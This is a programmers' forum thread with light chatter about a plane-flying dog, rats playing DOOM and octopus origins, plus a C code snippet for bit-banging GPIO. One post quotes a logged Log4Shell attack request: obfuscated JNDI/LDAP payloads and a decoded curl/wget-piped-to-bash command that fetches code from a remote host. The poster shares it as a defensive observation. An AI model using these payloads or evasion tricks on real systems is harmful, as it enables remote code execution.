|
|
A couple of years ago we had a TV show where they took a bunch of different pet dogs and whittled them down via various agility and obedience tests etc until they had a dog which they taught to pilot an light aircraft, by using lights to indicate to it what adjustments to make. It didn't just have to fly straight and level, though, they set it a route it had to navigate.
They didn't expect it to take off and land, of course. A pilot took it up, then handed the controls over to the dog.
|
|
|
|
|
Wrong section, you should have posted that in the newsletter!
And I am ever so happy I navigated on this forum out of boredom!
|
|
|
|
|
I thought this qualified as weird at least. =)
Real programmers use butterflies
|
|
|
|
|
Mm quite the Rube Goldberg's contraption. Though I have to say, the rat doesn't seem very invested in the game to me!
|
|
|
|
|
|
OT: I've seen the randomly capitalized headlines for a while now. Is there a rule for 'randomizing' the capitals? Just trying to make certain I'm up to date on all the important stuff...
Rats playing DOOM seems kinda pointless. After all, it can be played on toasters. Teach them to perform open-heart surgery, though, and I'll be impressed!
|
|
|
|
|
David O'Neil wrote: OT: I've seen the randomly capitalized headlines for a while now. Is there a rule for 'randomizing' the capitals? Just trying to make certain I'm up to date on all the important stuff...
Sometimes it can be used to hold a secret message (e.g. just read the uppercase letters or just the lowercase letters), but that doesn't reveal anything obvious in this instance. 'RuN DoOM' is almost RANDOM; perhaps it should have been 'RAts ruN DoOM'
The longest alternating consonant/vowel/consonant/vowel country name (like cAnAdA / cUbA) is UnItEd ArAb EmIrAtEs.
|
|
|
|
|
|
Those are not suction cups... are rocket propellants...
PS: As you can see, ants came even from further...
|
|
|
|
|
Joan M: PS: As you can see, ants came even from further...
Yes they did Joan...
Yes they did...
|
|
|
|
|
...and cockroaches, spiders, fleas, ticks, etc. just to piss us off.
The less you need, the more you have.
Even a blind squirrel gets a nut...occasionally.
JaxCoder.com
|
|
|
|
|
Well, Cthulhu is a cephalopod. So, checks out!
|
|
|
|
|
True, if you play a modded Stellaris.
Bastard Programmer from Hell
"If you just follow the bacon Eddy, wherever it leads you, then you won't have to think about politics." -- Some Bell.
|
|
|
|
|
Having bothered to follow the link to the paper, and scan that, I'm unsurprised to note that the paper in way makes the suggestion that Octopuses came from space. Rather, that organic material from space (such as viruses) may have affected the DNA of hosts to result in the mutations that became Octopuses and related species.
And the reviews summarised of the papers point out that there is insufficient evidence as yet to support even that claim.
Sounds like Science continues to function as intended to me. Science journalism on the other hand...
"If you don't fail at least 90 percent of the time, you're not aiming high enough."
Alan Kay.
|
|
|
|
|
The log4j scoundrels are getting cuter. Here's an example request from my forensic log
GET /?x=${jndi%3aldap%3a//195.54.160.149%3a12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=} HTTP/1.1|Host:138.130.164.133%3a443|User-Agent:${${%3a%3a-j}${%3a%3a-n}${%3a%3a-d}${%3a%3a-i}%3a${%3a%3a-l}${%3a%3a-d}${%3a%3a-a}${%3a%3a-p}%3a//195.54.160.149%3a12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=}|Referer:${jndi%3a${lower%3al}${lower%3ad}${lower%3aa}${lower%3ap}%3a//195.54.160.149%3a12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=}|Accept-Encoding:gzip|Connection:close To make it a bit more readable, here it is with %3a => : and split into individual headers (line splitting is CP's in both blocks)
GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=} HTTP/1.1
Host:138.130.164.133:443
User-Agent:${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=}
Referer:${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=}
Accept-Encoding:gzip
Connection:close The base64 "KGN1..." decodes to
(curl -s 195.54.160.149:5874/138.130.164.133:443||wget -q -O- 195.54.160.149:5874/138.130.164.133:443)|bash 138.130.164.133 was my public IPv4 address at the time.
Note the cutesy ways they are hiding "jndi" and "ldap" from simple text-string filters.
Needless to say, it got a short sharp 403 response (as does anything that hasn't got a Host header with a real URL I recognise).
APNIC tells me that 195.54.160.149 belongs somewhere in Russia. Surprise surprise... And yes, that's also the source address of the request.
Software rusts. Simon Stephenson, ca 1994. So does this signature. me, 2012
modified 28-Dec-21 23:12pm.
|
|
|
|
|
That's very concerning indeed....
Could it be I am getting old? I got absolutely no clue what I am looking at!
|
|
|
|
|
That is a dump of an incoming request (after TLS decryption so it's not complete gobbledegook).
My point was that the first round of log4j attacks had jndi:ldap in clear text, but now they are further encoding it to bypass naive filters.
As I understand it, the vulnerability arises from log4j doing JNDI lookups on various fields in the request.
And be careful mentioning "getting old" in these parts. I'm only a few weeks shy of 3/4 of a century.
Cheers,
Peter
Software rusts. Simon Stephenson, ca 1994. So does this signature. me, 2012
modified 8-Jan-22 1:00am.
|
|
|
|
|
ha... some of the data was related to the currently much talked about vulnerability, I see...
Mmm.. I am only at 2/4+
|
|
|
|
|
The original code was a bunch of preprocessor macros.
This is compile time if statements and lots of const folding.
It's deliberately unrolled so it's as inline as possible - this is very timing sensitive.
If you think this is bad, you should have seen the original code.
if(has_data_low_pins && has_data_high_pins) {
uint32_t pins_l = gpio_input_get();
pins_l = gpio_input_get();
pins_l = gpio_input_get();
uint32_t pins_h = gpio_input_get_high();
if(pin_d0>31) {
b = (((pins_h>>((pin_d0-32)&31))&1)<<0);
} else if(pin_d0>-1) {
b = (((pins_l>>(pin_d0))&1)<<0);
} else {
b=0;
}
if(pin_d1>31) {
b |= (((pins_h>>((pin_d1-32)&31))&1)<<1);
} else if(pin_d1>-1) {
b |= (((pins_l>>(pin_d1))&1)<<1);
}
if(pin_d2>31) {
b |= (((pins_h>>((pin_d2-32)&31))&1)<<2);
} else if(pin_d2>-1) {
b |= (((pins_l>>(pin_d2))&1)<<2);
}
if(pin_d3>31) {
b |= (((pins_h>>((pin_d3-32)&31))&1)<<3);
} else if(pin_d3>-1) {
b |= (((pins_l>>(pin_d3))&1)<<3);
}
if(pin_d4>31) {
b |= (((pins_h>>((pin_d4-32)&31))&1)<<4);
} else if(pin_d4>-1) {
b |= (((pins_l>>((pin_d4)&31))&1)<<4);
}
if(pin_d5>31) {
b |= (((pins_h>>((pin_d5-32)&31))&1)<<5);
} else if(pin_d5>-1) {
b |= (((pins_l>>(pin_d5))&1)<<5);
}
if(pin_d6>31) {
b |= (((pins_h>>((pin_d6-32)&31))&1)<<6);
} else if(pin_d6>-1) {
b |= (((pins_l>>(pin_d6))&1)<<6);
}
if(pin_d7>31) {
b |= (((pins_h>>((pin_d7-32)&31))&1)<<7);
} else if(pin_d7>-1) {
b |= (((pins_l>>(pin_d7))&1)<<7);
}
} else if(has_data_low_pins) {
uint32_t pins_l = gpio_input_get();
pins_l = gpio_input_get();
pins_l = gpio_input_get();
if(pin_d0>-1) {
b = (((pins_l>>(pin_d0))&1)<<0);
} else {
b=0;
}
if(pin_d1>-1) {
b |= (((pins_l>>(pin_d1))&1)<<1);
}
if(pin_d2>-1) {
b |= (((pins_l>>(pin_d2))&1)<<2);
}
if(pin_d3>-1) {
b |= (((pins_l>>(pin_d3))&1)<<3);
}
if(pin_d4>-1) {
b |= (((pins_l>>(pin_d4))&1)<<4);
}
if(pin_d5>-1) {
b |= (((pins_l>>(pin_d5))&1)<<5);
}
if(pin_d6>-1) {
b |= (((pins_l>>(pin_d6))&1)<<6);
}
if(pin_d7>-1) {
b |= (((pins_l>>(pin_d7))&1)<<7);
}
} else {
uint32_t pins_h = gpio_input_get_high();
pins_h = gpio_input_get_high();
pins_h = gpio_input_get_high();
if(pin_d0>-1) {
b = (((pins_h>>((pin_d0-32)&31))&1)<<0);
} else {
b=0;
}
if(pin_d1>-1) {
b |= (((pins_h>>((pin_d1-32)&31))&1)<<1);
}
if(pin_d2>-1) {
b |= (((pins_h>>((pin_d2-32)&31))&1)<<2);
}
if(pin_d3>-1) {
b |= (((pins_h>>((pin_d3-32)&31))&1)<<3);
}
if(pin_d4>-1) {
b |= (((pins_h>>((pin_d4-32)&31))&1)<<4);
}
if(pin_d5>-1) {
b |= (((pins_h>>((pin_d5-32)&31))&1)<<5);
}
if(pin_d6>-1) {
b |= (((pins_h>>((pin_d6-32)&31))&1)<<6);
}
if(pin_d7>-1) {
b |= (((pins_h>>((pin_d7-32)&31))&1)<<7);
}
}
Real programmers use butterflies
|
|
|
|
|
Seems OK. Any problems?
Looks like a code reflecting some hardware documentation table.
modified 15-Dec-21 4:11am.
|
|
|
|
|
Maintenance, testing, readability.
It's kind of messy in that regard.
It drives an 8-bit parallel bus using software. This is part of the code anyway.
Real programmers use butterflies
modified 15-Dec-21 11:48am.
|
|
|
|
|
How would you refactor that code so that it is mockery proof? Is it even possible? Just curious.
|
|
|
|
|
Well, I could make more inline functions to wrap that pin shifting, and probably reduce the number of if blocks, but that doesn't mean i'm going to.
Real programmers use butterflies
|
|
|
|
|
I would stick with the preprocessor macros myself. The results will be the same and it will be MUCH cleaner.
One thing that is puzzling is the gpio_input functions are called three times. Is that because of timing reasons?
"They have a consciousness, they have a life, they have a soul! Damn you! Let the rabbits wear glasses! Save our brothers! Can I get an amen?"
|
|
|
|